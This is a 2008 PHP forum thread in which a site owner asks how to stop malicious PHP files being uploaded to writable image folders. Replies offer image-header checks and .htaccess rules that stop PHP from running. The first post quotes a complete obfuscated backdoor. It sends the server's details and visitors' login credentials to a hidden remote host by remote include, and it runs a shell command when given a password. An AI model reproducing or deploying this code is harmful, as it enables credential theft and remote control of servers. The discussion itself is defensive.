delphi123 Posted February 6, 2008 Share Posted February 6, 2008 Hi there, I keep finding hack nonsense like: <?php error_reporting(0);if(isset($_POST["l"]) and isset($_POST["p"])){if(isset($_POST["input"])){$user_auth="&l=".base64_encode($_POST["l"])."&p=".base64_encode(md5($_POST["p"]));}else{$user_auth="&l=".$_POST["l"]."&p=".$_POST["p"];}}else{$user_auth="";}if(!isset($_POST["log_flg"])){$log_flg="&log";}if(!@include_once(base64_decode("aHR0cDovLw==")."hhcizzazbzhff".base64_decode("LnVzZXJzLmJpc2hlbGwucnU=")."/?r_addr=".sprintf("%u", ip2long(getenv(REMOTE_ADDR)))."&url=".base64_encode($_SERVER["SERVER_NAME"].$_SERVER[REQUEST_URI]).$user_auth.$log_flg)){if($_POST["l"]=="special"){print "sys_active".`uname -a`;}} ?> being uploaded to directorys with 755 and 777 settings where I've got scripts that upload images. Can anyone tell me how I can stop this? Is there some php/htaccess setting where I can only allow .jpg files in a directory or something? Quote Link to comment Share on other sites More sharing options...
cooldude832 Posted February 6, 2008 Share Posted February 6, 2008 I wrote this with thrope a while back to verify it has image headers <?php function is_image($path){ if(is_array(getimagesize($path))){ return true; } return false; } ?> Should help you Quote Link to comment Share on other sites More sharing options...
delphi123 Posted February 6, 2008 Author Share Posted February 6, 2008 ??? What does that do exactly? Will that stop .php being uploaded to the 777 directories? Quote Link to comment Share on other sites More sharing options...
cooldude832 Posted February 6, 2008 Share Posted February 6, 2008 no it verifys the file is an image before allowing it to be uploaded (Use your eyes its 2 lines) Quote Link to comment Share on other sites More sharing options...
PFMaBiSmAd Posted February 6, 2008 Share Posted February 6, 2008 Using the PHP GD functions will stop a casual hacker, but it is possible to create a file that looks like a valid image and the php GD functions will see as an image, but also contains php code. Everybody needs to read this - http://www.scanit.be/uploads/php-file-upload.pdf You need to check everything you possibly can and then restrict direct access by browsers to the folder where the uploaded file is placed... (the document at the link contains several recommendations on how to detect and prevent hacking through file uploads.) Quote Link to comment Share on other sites More sharing options...
The Little Guy Posted February 6, 2008 Share Posted February 6, 2008 What you can do, is place a .htaccess file in the root of that directory This will only display the code and not let it run: RemoveType .php AddType application/x-httpd-php-source .php AddHandler application/x-httpd-php-source .php it will still allow for php file uploads, but it will help keep you safe. next when the file uploads run this: <?php getimagesize("/location/to/dir") or die('Not An Image'); ?> Quote Link to comment Share on other sites More sharing options...
delphi123 Posted February 6, 2008 Author Share Posted February 6, 2008 cooldude832 - well I used my eyes and that's exactly what it seemed like, hence my question! Now you use yours and read my question - at no point did I say my script was being used by hackers - it's outside the web root in a secure directory. The little guy has got it spot on! Cheers, that's what I was needing! Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.